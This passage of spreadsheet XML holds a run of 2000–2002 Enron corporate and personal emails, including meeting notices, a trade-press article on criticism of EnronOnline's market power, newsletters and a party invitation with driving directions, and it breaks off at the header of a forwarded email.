					&lt;tr&gt;_x000D_
					&lt;td align="center"&gt;&lt;font face="arial, verdana, sans-serif" size="1"_x000D_
color="#ffffff"&gt;Copyright 2001 SportsLine.com, Inc.  All rights reserved, CBS "eye device" is a registered trademark of CBS_x000D_
Inc.&lt;/font&gt;_x000D_
					&lt;br&gt;_x000D_
					&lt;!--[{(matthew.lenhart@enron.com)}] --&gt;_x000D_
					&lt;/td&gt;_x000D_
					&lt;/tr&gt;_x000D_
					&lt;/table&gt;_x000D_
					&lt;img src="http://secure.emailpub.com/sensor?image=3704&amp;id=218929650" height="1"_x000D_
width="1"&gt;_x000D_
				&lt;/td&gt;_x000D_
				&lt;/tr&gt;_x000D_
				&lt;/table&gt;_x000D_
		&lt;/td&gt;_x000D_
		&lt;/tr&gt;_x000D_
		&lt;/table&gt;_x000D_
	&lt;/body&gt;_x000D_
&lt;/html&gt;_x000D_
_x000D_
_x000D_
_x000D_
&lt;!--Deployed By cutroni 11.16.2001 17:13:32 Log#:20011116171325_22095_cutroni--&gt;</t>
  </si>
  <si>
    <t>Thu, 6 Sep 2001 13:00:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Daughters and Dating</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Murphy, Tim  [mailto:Tim.Murphy@ElPaso.com] _x000D_
Sent:	Friday, August 17, 2001 2:31 PM_x000D_
To:	'Bump, Dan' ; 'Whitt, Mark' _x000D_
Subject:	FW: Daughters and Dating_x000D_
_x000D_
_x000D_
_x000D_
-_x000D_
_x000D_
_x000D_
_x000D_
-_x000D_
_x000D_
For all of us with daughters, this is nice and simple to administer, during_x000D_
the dating process._x000D_
_x000D_
_x000D_
+_x000D_
_x000D_
_x000D_
_x000D_
+_x000D_
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 APPLICATION DAUGHTER.doc </t>
  </si>
  <si>
    <t>Mon, 1 Jan 2001 08:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'edie.leschber@enron.com'})</t>
  </si>
  <si>
    <t>Re: Gas Team - Reorg</t>
  </si>
  <si>
    <t xml:space="preserve">that info is correct._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Edie Leschber                           12/29/2000 12:30 PM_x000D_
	_x000D_
_x000D_
To: John Arnold/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Gas Team - Reorg_x000D_
_x000D_
John,_x000D_
My name is Edie Leschber and I will be your Business Analysis and Reporting _x000D_
Contact effective immediately.  I am currently in the process of_x000D_
verifying team members under your section of the Gas Team.  Attached is a _x000D_
file with the current list.  Please confirm that your list is complete and/or_x000D_
send me changes to it at your earliest convenience.  New cost centers have _x000D_
been set up due to the reorganization and we would like to begin using these_x000D_
as soon as possible.  I look forward to meeting you and working with you very _x000D_
soon.  Thank you for your assistance._x000D_
_x000D_
_x000D_
_x000D_
Edie Leschber_x000D_
X30669_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 22:26:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'litebytz@enron.com'})</t>
  </si>
  <si>
    <t>Lite Bytz RSVP</t>
  </si>
  <si>
    <t>_x000D_
This week's Lite Bytz presentation will feature the following TOOLZ speaker:_x000D_
_x000D_
Richard McDougall_x000D_
Solaris 8_x000D_
Thursday, June 7, 2001_x000D_
_x000D_
If you have not already signed up, please RSVP via email to litebytz@enron.com by the end of the day Tuesday, June 5, 2001._x000D_
_x000D_
*Remember: this is now a Brown Bag Event--so bring your lunch and we will provide cookies and drinks._x000D_
_x000D_
Click below for more details._x000D_
_x000D_
http://home.enron.com:84/messaging/litebytztoolzprint.jpg</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 03:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lacye.trevino@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'susan.scott@enron.com', 'gerald.nemec@enron.com', 'mark.knippa@enron.com', 'drew.fossum@enron.com'})</t>
  </si>
  <si>
    <t>ETS Meeting</t>
  </si>
  <si>
    <t>Please note the following meeting set for tomorrow:_x000D_
 Date: 02/01/01_x000D_
 Time:10:30 until 11:30_x000D_
 Subject: ETS_x000D_
 Invitees: Susan Scott_x000D_
       Drew Fossum_x000D_
       Gerald Nemec_x000D_
 Chair: Mark Knippa_x000D_
_x000D_
_x000D_
Please feel free to contact me with any questions that you may have. _x000D_
_x000D_
Thank you,_x000D_
Lacye Trevino_x000D_
713-853-4887</t>
  </si>
  <si>
    <t>Wed, 13 Sep 2000 03:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>From today's NGI</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Greg Whalley/HOU/ECT on 09/13/2000 10:08 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Andy Zipper@ENRON_x000D_
09/13/2000 09:24 AM_x000D_
To: Greg Whalley/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: From today's NGI_x000D_
_x000D_
I think we should discuss our response to this._x000D_
---------------------- Forwarded by Andy Zipper/Corp/Enron on 09/13/2000 _x000D_
09:16 AM ---------------------------_x000D_
From: Bob Shults@ECT on 09/13/2000 09:03 AM_x000D_
To: Andy Zipper/Corp/Enron@Enron, Louise Kitchen_x000D_
cc:  _x000D_
_x000D_
Subject: From today's NGI_x000D_
_x000D_
FYI_x000D_
---------------------- Forwarded by Bob Shults/HOU/ECT on 09/13/2000 08:57 AM _x000D_
---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Rahil Jafry                                                            _x000D_
 09/13/2000 08:57 AM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Bob Shults/HOU/ECT@ECT, Daniel Diamond/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: From today's NGI_x000D_
_x000D_
EnronOnline Market Power Under Fire_x000D_
_x000D_
The simmering pot of market concerns regarding the market power of _x000D_
EnronOnline finally boiled over in public yesterday at Chicago's LDC Forum. A _x000D_
representative from EnronOnline had to fend off verbal attacks from _x000D_
competitors and from the audience, who criticized the system as giving Enron _x000D_
the ability to manipulate prices and provide it with an unfair advantage over _x000D_
competitors. _x000D_
_x000D_
Scott Coleman, an official at Altra Energy Technologies, said proprietary _x000D_
systems like EnronOnline, and systems being developed by a consortium of _x000D_
large market players, represent a danger to the health of the energy industry _x000D_
because of their current or potential market power. Altrade operates its own _x000D_
independent online exchange that is one of Enron's biggest electronic _x000D_
competitors. It differs from EnonOnline in that various buyers and sellers _x000D_
trade with each other with Altrade serving to clear the transactions. On _x000D_
EnronOnline, Enron posts bid and asked prices and is a party in every _x000D_
transaction. _x000D_
_x000D_
The proprietary EnronOnline trading system has been accused of market _x000D_
manipulation mainly because of its tremendous growth since going live last _x000D_
November and because of the market strength of its operator, Enron Corp. _x000D_
_x000D_
Enron is the energy industry's largest marketer/trader/risk manager and one _x000D_
of the largest natural gas pipeline operators. About 60% of its marketing and _x000D_
trading business today is done over the EnronOnline system. Critics charged _x000D_
that EnronOnline provides a tremendous advantage to its parent because all of _x000D_
the transaction data is thrown into a historical database that is available _x000D_
only to Enron. _x000D_
_x000D_
EnronOnline has handled more than 280,000 transactions worth $140 billion _x000D_
since going live. The proprietary system handles about 2,000 transactions _x000D_
every day with a value estimated at $1 billion, and most of its online _x000D_
business is natural gas and power sales and purchases. _x000D_
_x000D_
Why has the system been so successful? It's free, easy to use, low risk and _x000D_
there is a tight bid-ask spread, both EnronOnline and its competitors note. _x000D_
There's no special hardware required; everything is on the web and a _x000D_
transaction is as simple as a couple clicks of the mouse. It also provides a _x000D_
broad variety of information, including prices on 1,000 products, and is _x000D_
supported by the largest energy marketing firm. Although there are many other _x000D_
systems out there, few if any have the content, ease of use and price _x000D_
discovery of EnronOnline. _x000D_
_x000D_
Critics claimed that power enables EnronOnline to "soak up liquidity" in the _x000D_
marketplace, and in doing so give itself a tremendous advantage over its _x000D_
competitors. With each trade, Enron gains a little bit more information about _x000D_
its competitors' positions in the market. _x000D_
_x000D_
"Over the long term I think the market will always correct itself," said _x000D_
Altra's Coleman. "But in the short term, I think if any one player has enough _x000D_
of a presence in any one market they can cause prices to move in one _x000D_
direction or another." _x000D_
_x000D_
EnronOnline Director Bob Shults said the company is simply "providing a _x000D_
service for our customers, particularly a bid and ask. But I don't think _x000D_
Enron has the ability to move markets. We are just putting a bid and ask out _x000D_
there, and if people want to buy at our prices, then fine. If people want to _x000D_
sell at our prices, fine then sell it. I don't think we have the market _x000D_
manipulation capability people suspect... We are not bigger than the _x000D_
marketplace." _x000D_
_x000D_
When asked specifically about historical data collected on those who use the _x000D_
system, Shults denied the company studies the buying and selling patterns of _x000D_
its competitors with an eye toward manipulation --- sort of the "Big Brother" _x000D_
of the energy marketplace. _x000D_
_x000D_
"The historical information is not available," EnronOnline's Shults admitted. _x000D_
"We just started calculating the indices and price reports... We are now _x000D_
providing that information to the market so everyone else has that _x000D_
information as well." He said Enron does not retain information about those _x000D_
who use its system. _x000D_
_x000D_
Shults did, however, warn that the system will make the U.S. energy market _x000D_
much more closely connected to the global marketplace in the future. With _x000D_
increasing demand for LNG imports and rapid price discovery of worldwide _x000D_
commodities on EnronOnline, for example, market activity in Africa and the _x000D_
Far East could have a more immediate impact on domestic markets. _x000D_
_x000D_
Quoting analysis conducted by Forester Research Inc., Shults also predicted _x000D_
electronic exchange revenues could grow from $500 billion this year to more _x000D_
than $3 trillion in 2004-2005. _x000D_
_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
--_x000D_
_x000D_
,Copyright 2000 Intelligence Press Inc. All rights reserved. The preceding _x000D_
news report may not be republished or redistributed, in whole or in part, in _x000D_
any form, without prior written consent of Intelligence Press, Inc._x000D_
 _x000D_
Copyright ,2000 Intelligence Press Inc. All rights reserved.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 07:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Dow Jones Index Prices - Database Access</t>
  </si>
  <si>
    <t>I'd like to inquire about the Dow Jones index price database currently being _x000D_
maintained by the Fundamentals group. It's come to my attention - by virtue _x000D_
of the fact that I receive the Dow Jones data each afternoon - that several _x000D_
people are interested in having access to those figures. I've had requests _x000D_
from mid-marketing, trading, and scheduling, and am working with IT to put _x000D_
the NP-15 and SP-15 data online. Cara Semperger, in particular, relies on the _x000D_
index prices in order to run one of her reports._x000D_
_x000D_
I'm wondering if it  would be possible to give these people access to your _x000D_
database, or maybe if your group would benefit from the data I receive. Your _x000D_
spreadsheet looks like a compilation of the documents I receive from Dow _x000D_
Jones, and one might be more useful for an individual or group than the _x000D_
other. I don't have a preference either way - I'm more than happy to compile _x000D_
the reports in a separate folder. Please let me know what works best for you. _x000D_
(I sit in the middle of the room between Tracy Ngo and Val Sabo.)_x000D_
_x000D_
Thanks,_x000D_
Kate</t>
  </si>
  <si>
    <t>Wed, 14 Jun 2000 00:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>draft strawman</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sally,_x000D_
_x000D_
As we discussed yesterday, here is the draft strawman._x000D_
_x000D_
Regards_x000D_
_x000D_
Shona_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 18:10:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'shockwave@mms.shockwave.com'})</t>
  </si>
  <si>
    <t>DJ Fu 2: phat beats, cool kicks &amp; new friends!</t>
  </si>
  <si>
    <t>_x000D_
[IMAGE]=09[IMAGE] =09Nov  15, 2001=09[IMAGE]=09_x000D_
=09=09=09[IMAGE]=09_x000D_
_x000D_
_x000D_
[IMAGE] =09_x000D_
_x000D_
_x000D_
 =09[IMAGE]=09DJ  FU WAX ATTACK 2: A KICKIN' NEW MIX =09 =09[IMAGE]=09_x000D_
=09=09=09=09[IMAGE]=09_x000D_
[IMAGE] =09[IMAGE]=09=09=09    The king of the Kung  Fu DJs is back with an=_x000D_
 all new mix of back-breaking beats and kicks!  In this exciting sequel, Fu=_x000D_
 teams up with female mixing phenom DJ  Zee for a four-city Ninja DJ Tour a=_x000D_
cross the US. Play now! (Brought  to you by Ford Focus.)      =09_x000D_
[IMAGE]=09=09=09=09=09_x000D_
 ATTENTION  MEMBERS  [IMAGE]     When the redesigned Shockwave.com launched=_x000D_
 on August 21, it  came with an updated privacy policy. Your privacy is imp=_x000D_
ortant  to us -- please  read it.      [IMAGE] SPONSORED  LINK  [IMAGE]    =_x000D_
 Thanksgiving  special  @ Empire of Gold - Get up to $225 FREE and  WIN BIG=_x000D_
 on $40+ games! Click   to claim.           =09=09=09=09   [IMAGE] [IMAGE] =_x000D_
    DOWNLOAD  60 JIGSAW PUZZLES  That's right, 60! With one  easy download =_x000D_
of Shockwave Jigsaws, you can keep your brain occupied  for months. If you'=_x000D_
re looking for full-screen, off-line puzzling action,  you'll want to buy n=_x000D_
ow!     [IMAGE]    [IMAGE]     SAVE  $5 ON MIDWAY CLASSICS Want real  arcad=_x000D_
e action without a pocketful of quarters? Act now to get a mammoth  pack of=_x000D_
 10 classic arcade games for the unbelievably low price of  just $14.95. Do=_x000D_
wnload now!     [IMAGE]     [IMAGE]       DIAMOND  MINE: PLAY A PRECIOUS PU=_x000D_
ZZLER  Our new puzzle game lines  up like a glittering tic-tac-toe: swap pr=_x000D_
ecious jewels around to put  together three in a row before the clock runs =_x000D_
out!     [IMAGE]    [IMAGE]     FREE  CASINO ACTION  Deal yourself a poker =_x000D_
hand,  play the slots, and challenge blackjack players worldwide -- all wit=_x000D_
hout  losing a dime!     [IMAGE]    [IMAGE]     WATCH  REGURGE, STAINBOY, A=_x000D_
ND MORE!  Your favorite Shockwave  Shows aren't gone; they've just moved! Y=_x000D_
ou can find Regurge, Stainboy,  Radiskull, and the rest at our partner site=_x000D_
, AtomFilms.com.     [IMAGE]  Unsubscribe Instructions: To unsubscribe from=_x000D_
 the Shockwave.com newsletter, click here .    =09_x000D_
_x000D_
[IMAGE]</t>
  </si>
  <si>
    <t>Sun, 19 Aug 2001 17:26:35 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rinaldijohn@yahoo.com'})</t>
  </si>
  <si>
    <t>Greetings from your Toronto (US bound) cousin!</t>
  </si>
  <si>
    <t>Hey John,_x000D_
_x000D_
I can't believe it - again, I just finished watching_x000D_
lefty lose a major. Oh well, someday he'll win I_x000D_
guess.  There was some good golf though, especially on_x000D_
Saturday._x000D_
_x000D_
So, if you haven't figured it out yet, it's me, the_x000D_
lefty from Canada.  How are things?_x000D_
_x000D_
Sorry to bother you at work. I don't have your home_x000D_
email or new phone number in Houston._x000D_
_x000D_
Anyhow, I just wanted to ask you a couple of questions_x000D_
about life in the US.  Yes, I finally accepted a job,_x000D_
in Fairfax, Virginia, a suburb community about 15_x000D_
miles west of Washington.  It is a multi-disciplinary_x000D_
design firm, and I am going to be starting in the_x000D_
first week of October. And the area seems to be really_x000D_
nice, great golf, not much winter, great pro sports,_x000D_
and hopefully lovely 'Americanan gals'!!!_x000D_
_x000D_
I think I have almost everything under control thus_x000D_
far, except I have a couple of questions that I_x000D_
wouldn't mind your opinion on._x000D_
_x000D_
First, I want to select a bank just for simple_x000D_
personal banking, cheques, withdrawls , etc.  In_x000D_
Fairfax, the predominant one seems to be Bank of_x000D_
America.  They also have SunTrust and United.  The_x000D_
other ones (like Fleet, First Union etc.) don't seem_x000D_
to be really located there much._x000D_
I guess I'm looking for a major bank to start off with_x000D_
like the CIBC or Royal in Canada. Is Bank of America_x000D_
OK. What do you think?_x000D_
_x000D_
Secondly, (due to my Italian 'cheap' save money_x000D_
attitude), I am looking for a VISA that collects air_x000D_
miles. (In Canada here, I had CIBC Aerogold which was_x000D_
excellent for Air Canada reward travels). I guess I am_x000D_
looking for a gold/platinum card that is best for_x000D_
flight miles.  I flew United when I went to the_x000D_
interview to Washington, and I understand that United_x000D_
has a Mileage Plus First Gold VISA.  Also, I have_x000D_
found other cards including Delta Skymiles AMEX, US_x000D_
Air Dividend Miles Platinum, Continental Platinum and_x000D_
TWA Aviators Gold.  I guess ideally am I looking for_x000D_
the best card that will allow me to accumulate points_x000D_
to fly from Washington to Toronto (since that's where_x000D_
most people I know live now).  I am also not to sure_x000D_
which airlines are reputable that would fly into_x000D_
Toronto.  Maybe you could tell me what card you guys_x000D_
have, or which ones might be worth looking into._x000D_
_x000D_
Anyhow, I would really appreciate when you have a_x000D_
chance sometime to drop me a line or give me a ring_x000D_
(905)709-7970 with some of this info._x000D_
_x000D_
As for now, have a great rest of day at work.  Say_x000D_
'hi' to Dina and Little 'Tiger'.  Hope all is well_x000D_
with you guys.  Maybe I will get to see you more now_x000D_
that it is not so far and so expensive to fly down_x000D_
there._x000D_
_x000D_
Take care for now, JR._x000D_
_x000D_
P.S.  Yes there is another stadium in the world to see_x000D_
a ball game other than Wrigley.  I saw Boston at_x000D_
Cambden Yards last weekend and it was awesome.  What a_x000D_
classic modern baseball stadium design. And the Ripken_x000D_
mania stuff is nuts.  The Ribs in Baltimore are_x000D_
amazing, just like wings in Buffalo. See you later._x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Make international calls for as low as $.04/minute with Yahoo! Messenger_x000D_
http://phonecard.yahoo.com/</t>
  </si>
  <si>
    <t>Tue, 28 Mar 2000 06:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Astros tickets for Friday(3/31)</t>
  </si>
  <si>
    <t>I'll take two ,,, if possible</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 00:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'russell.tucker@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'roger.raney@enron.com', 'stephen.allen@enron.com', 'scott.watson@enron.com', 'gary.allen@enron.com', 'henry.van@enron.com', 'shelley.corman@enron.com', 'kenneth.lovejoy@enron.com', 'herb_caballero@enron.net', 'ron.wells@enron.com', 'tonyb@nepco.com', 'george.orum@enron.com', 'donnie.willmann@enron.com', 'paul.duplachan@enron.com', 'john.shafer@enron.com'})</t>
  </si>
  <si>
    <t>OSHA Ergo Final Rule Clarification</t>
  </si>
  <si>
    <t xml:space="preserve">The attachment below is the personal response from Charles Jeffress to NAM's _x000D_
request for clarification as to the compliance date for enforcement to _x000D_
commence for the OSHA final rule on Ergonomics. _x000D_
_x000D_
This credits the proposed Enron Grandfathering plan to have the remainder of _x000D_
the time to Oct. 15, 2001 in which to achieve full activation of the written _x000D_
plans within each of the Enron companies._x000D_
_x000D_
While there are substantial numbers of law suits filed over this final rule, _x000D_
the outlook for any satisfactory court action is unlikely, as is action from _x000D_
Congress. Any repeal actions from a new OSHA administration would likely take _x000D_
longer than Oct. 15, 2001 to become effective. _x000D_
_x000D_
Russ_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 Jan 2002 08:24:17 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: 8th Annual IDHAFR Party</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Monique Sanchez" &lt;moshuffle@hotmail.com&gt;@ENRON  _x000D_
Sent:	Saturday, January 05, 2002 1:48 PM_x000D_
To:	Scott, Susan M.; susan_m_scott@hotmail.com_x000D_
Subject:	Fwd: 8th Annual IDHAFR Party_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;From: "Robert A Parry, M.S., DABMP" &lt;rparry@bcm.tmc.edu&gt;_x000D_
&gt;To: "A. Stroh" &lt;Stroh92@aol.com&gt;, "Aimee" &lt;AFriend@jdf.org&gt;,   "Andrew &amp;_x000D_
&gt;Debby" &lt;dna93@Prodigy.net&gt;, "Angie \(Home\)" &lt;Angie105R@aol.com&gt;,   "Audra"_x000D_
&gt;&lt;Audbrock@aol.com&gt;, "Ben ?" &lt;trade.wind@verizon.net&gt;,   "Bill Reidler"_x000D_
&gt;&lt;BILLR@PRO-LINE.COM&gt;, "Bryan McGuire" &lt;bryan95@ev1.net&gt;,   "Carolyn Doss"_x000D_
&gt;&lt;Carolyn_Doss@Dell.com&gt;, "Chad Degges" &lt;cdegges@htstx.com&gt;,   "Chris Brown"_x000D_
&gt;&lt;GChristopBrown@aol.com&gt;, "Chris DelCampo" &lt;delcampo@slb.com&gt;,   "Christie_x000D_
&gt;Holtman" &lt;christieh@rocketball.com&gt;, "Crispin" &lt;cglymph@dow.com&gt;,_x000D_
&gt;"Cullen" &lt;cullen_seitz@Dell.com&gt;,   "Danny Oliver \(work\)"_x000D_
&gt;&lt;oliverd@wellsfargo.com&gt;,   "David \(Work\)" &lt;dhearne@bcm.tmc.edu&gt;,_x000D_
&gt;"David B" &lt;dbalmos@landtech-inc.com&gt;, "Demian" &lt;demianv@cisco.com&gt;,_x000D_
&gt;"Eddie \(Home\)" &lt;egiles2@houston.rr.com&gt;, "Fontaine" &lt;fonfiney@yahoo.com&gt;,_x000D_
&gt;   "Gina &amp; Neil K" &lt;neil.gina@wtez.net&gt;, "Greg Mustachia" &lt;gmm95@juno.com&gt;,_x000D_
&gt;   "Gretchen" &lt;GKreidler@sfvdallas.com&gt;, "Guicho" &lt;guicho_pons@yahoo.com&gt;,_x000D_
&gt;  "Jared Mermis" &lt;jared.mermis@puffer.com&gt;,   "Jarrod \(Work\)"_x000D_
&gt;&lt;Jarrod_Haughn@fpl.com&gt;,   "Jason Lindenschmidt" &lt;jlindens@us.tivoli.com&gt;,_x000D_
&gt;  "Jeannine" &lt;jfrench@sleh.com&gt;, "Jeff Vasek" &lt;Jeff_Vasek@Foleys.com&gt;,_x000D_
&gt;"John Camp" &lt;John.Camp@sci-us.com&gt;, "John PG" &lt;jgarrett@muropharm.com&gt;,_x000D_
&gt;"Jon Lillehaugen" &lt;Jon.Lillehaugen@compaq.com&gt;, "Joy"_x000D_
&gt;&lt;joyaden@netzero.net&gt;,   "Keisha L. Jones" &lt;KLJones@trammellcrow.com&gt;,_x000D_
&gt;"Keith Taylor" &lt;keith.taylor@airliquide.com&gt;, "Keric" &lt;kclanaha@lcc.net&gt;,_x000D_
&gt;"Kevin" &lt;Kkoelzer@horizonoffshore.com&gt;,   "Kevin &amp; Cheryl"_x000D_
&gt;&lt;koelzer@mail.ev1.net&gt;, "Kosta" &lt;kselinidis@ASF.COM&gt;,   "Kristi W"_x000D_
&gt;&lt;kwarrington94@yahoo.com&gt;, "Laura" &lt;laurambledsoe@hotmail.com&gt;,   "Laurette_x000D_
&gt;Veres" &lt;laurette@intelecard.com&gt;,   "Leigh Ann" &lt;lashands@earthlink.net&gt;,_x000D_
&gt;"Lisa" &lt;lmlongoria@yahoo.com&gt;,   "Loftus &amp; Lea"_x000D_
&gt;&lt;loftuslea@worldnet.att.net&gt;, "Matt" &lt;m.mosley@ssss.com&gt;,   "Matteo"_x000D_
&gt;&lt;mmielcarek@excite.com&gt;,   "Mauricio E. Pons"_x000D_
&gt;&lt;mauricio.e.pons@us.pwcglobal.com&gt;,   "Michael" &lt;mfallek@acnet.net&gt;,_x000D_
&gt;"Mickey Hanning" &lt;mhanning@option-one.com&gt;,   "Mike"_x000D_
&gt;&lt;charlton@uthscsa.edu&gt;, "Molly" &lt;mmckellep@houston.rr.com&gt;,   "Monica"_x000D_
&gt;&lt;MONICA.CUELLAR@chase.com&gt;,   "Rob Boughton" &lt;raboughton@mail.ev1.net&gt;,_x000D_
&gt;"Romeo Sanchez" &lt;romeo_o_sanchez@hotmail.com&gt;, "SCB"_x000D_
&gt;&lt;sbushong@bcm.tmc.edu&gt;,   "Scott E" &lt;Scott.A.Eckert@mail.sprint.com&gt;,_x000D_
&gt;"Scott H" &lt;Scott.Humble@cmcsg.com&gt;,   "Scott Woloson"_x000D_
&gt;&lt;swoloson@adv-eng-ser-inc.com&gt;,   "Sean" &lt;shumble615@yahoo.com&gt;, "Sid"_x000D_
&gt;&lt;sid.boswell@accenture.com&gt;,   "Staci \(work\)"_x000D_
&gt;&lt;staci.burns@adelphiacom.com&gt;,   "Todd D" &lt;Todd_Doss@Dell.com&gt;, "Todd_x000D_
&gt;Leonard" &lt;JL078700@MSXSCC.shell.com&gt;,   "Traci"_x000D_
&gt;&lt;tferri01@sprintspectrum.com&gt;, "Trip \(Work\)" &lt;JWFRIEND@dow.com&gt;,   "Wes"_x000D_
&gt;&lt;wes.oliver@worldnet.att.net&gt;,   "Yianis Selinidis"_x000D_
&gt;&lt;yianisselinidis@hotmail.com&gt;_x000D_
&gt;CC: "John RM" &lt;jmenconi@adv-eng-ser-inc.com&gt;,   "Leslie"_x000D_
&gt;&lt;lj@ronaldmcdonald-houston.org&gt;, "Mo" &lt;moshuffle@hotmail.com&gt;,   "Nels_x000D_
&gt;\(Work\)" &lt;nhofland@fnac-usa.com&gt;, "Tatia" &lt;tatia@whg.com&gt;_x000D_
&gt;Subject: 8th Annual IDHAFR Party_x000D_
&gt;Date: Thu, 3 Jan 2002 09:14:22 -0600_x000D_
&gt;_x000D_
&gt;To all whom these presents may come Greeting, Be it Known that, Everyone_x000D_
&gt;Reading This, having completed the rigors and satisfied the requirements_x000D_
&gt;for making it through the Year of 2001, has accordingly been invited to the_x000D_
&gt;8th Annual IDHAFR Party with all the honors, rights, and privileges_x000D_
&gt;belonging thereto. Given under the seal of the Usual Suspects, to take_x000D_
&gt;place on:_x000D_
&gt;_x000D_
&gt;Saturday Night, January 19th, 2002_x000D_
&gt;_x000D_
&gt;So please, join us once again for an evening of as much or as little_x000D_
&gt;debauchery as you are up for.  We strive to accommodate all.  As always any_x000D_
&gt;pregnant friends out there reading this are welcome, it just wouldn't be_x000D_
&gt;the same without some big bellys!  I can't imagine too many folks are_x000D_
&gt;unaware of what IDHAFR is, or how the party unfolds anymore.  But if so,_x000D_
&gt;you must give at least one reasonable guess, and then come to the party to_x000D_
&gt;find out both!_x000D_
&gt;_x000D_
&gt;We hope this notice finds everyone in good health and spirits this new_x000D_
&gt;year. Out of town guests are especially welcome, sleeping (?) arrangements_x000D_
&gt;can always be found.  I believe we have used cars, underneath pool tables,_x000D_
&gt;floor space on purpose, floor space on accident..._x000D_
&gt;_x000D_
&gt;So come one and come all!  Written direction are below, and a Microsoft_x000D_
&gt;Word file is attached with a map and directions.  Let the replies flow!_x000D_
&gt;_x000D_
&gt;Saturday, January 19th, 8th Annual IDHAFR Party_x000D_
&gt;_x000D_
&gt;Come anytime after 6PM (Excluding "Special" invitees!!!)_x000D_
&gt;_x000D_
&gt;The later you come the farther you'll have to park_x000D_
&gt;_x000D_
&gt;I recommend avoiding driveways and fire hydrants_x000D_
&gt;_x000D_
&gt;*&gt;&gt;From US Hwy 290 exit Loop 610 East_x000D_
&gt;_x000D_
&gt;*&gt;&gt;From North I-45 or North US Hwy 59 exit Loop 610 West_x000D_
&gt;_x000D_
&gt;From North Loop 610 exit Ella Blvd (Exit 14), it's between the T.C.Jester_x000D_
&gt;and Shepherd/Durham exits_x000D_
&gt;_x000D_
&gt;Turn South on Ella and go 1.35 miles to Grovewood (just past Elementary_x000D_
&gt;school on left)_x000D_
&gt;_x000D_
&gt;Turn left (East) on Grovewood and go 0.01 miles to Clovis_x000D_
&gt;_x000D_
&gt;Turn right (South) on Clovis (this is your First right) and go 0.15 miles_x000D_
&gt;to Wister_x000D_
&gt;_x000D_
&gt;Turn left (East) on Wister (this is your second left) and go 0.05 miles to_x000D_
&gt;IDHAFR 3rd house on left; 6422 Wister._x000D_
&gt;_x000D_
&gt;*&gt;&gt;If you are South of I-10, get to I-10 however you want_x000D_
&gt;_x000D_
&gt;From I-10, inside Loop 610, exit T.C.Jester (Exit 765A),_x000D_
&gt;_x000D_
&gt;it's the second exit from the West Loop and is between the_x000D_
&gt;Washington/Westcott and Shepherd/Durham exits_x000D_
&gt;_x000D_
&gt;Turn North on T.C.Jester and go 0.85 miles to the light at 11th Street_x000D_
&gt;_x000D_
&gt;Turn left (West) on 11th at the light and go 0.55 miles to Shirkmere (just_x000D_
&gt;past wooded lot on right)_x000D_
&gt;_x000D_
&gt;Turn right (North) on Shirkmere and go 0.15 miles to the Stop sign at_x000D_
&gt;Wister_x000D_
&gt;_x000D_
&gt;Turn left (West) on Wister and go 0.2 miles to IDHAFR on right; 6422_x000D_
&gt;Wister._x000D_
&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
__________________________________________________________________x000D_
MSN Photos is the easiest way to share and print your photos:_x000D_
http://photos.msn.com/support/worldwide.aspx_x000D_
_x000D_
 - IDHAFR.doc </t>
  </si>
  <si>
    <t>Thu, 28 Dec 2000 00:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">attachments_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 09:55:28 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bmckay@houston.rr.com'})</t>
  </si>
  <si>
    <t>FW: Why Palestenians throw rocks</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Griffith, John  _x000D_
Sent:	Wednesday, October 24, 2001 10:32 AM_x000D_
To:	Mckay, Brad; Zipper, Andy; Maggi, Mike; Arnold, John; Quigley, Dutch; Taylor, Craig; 'mattc@elitebrokers.net'_x000D_
Subject:	FW: Why Palestenians throw rocks_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Moon, Eric  _x000D_
Sent:	Wednesday, October 24, 2001 10:28 AM_x000D_
To:	Griffith, John_x000D_
Subject:	FW: Why Palestenians throw rocks_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Tami, Eric and Jake Moon" &lt;etjmoon@prodigy.net&gt;@ENRON  _x000D_
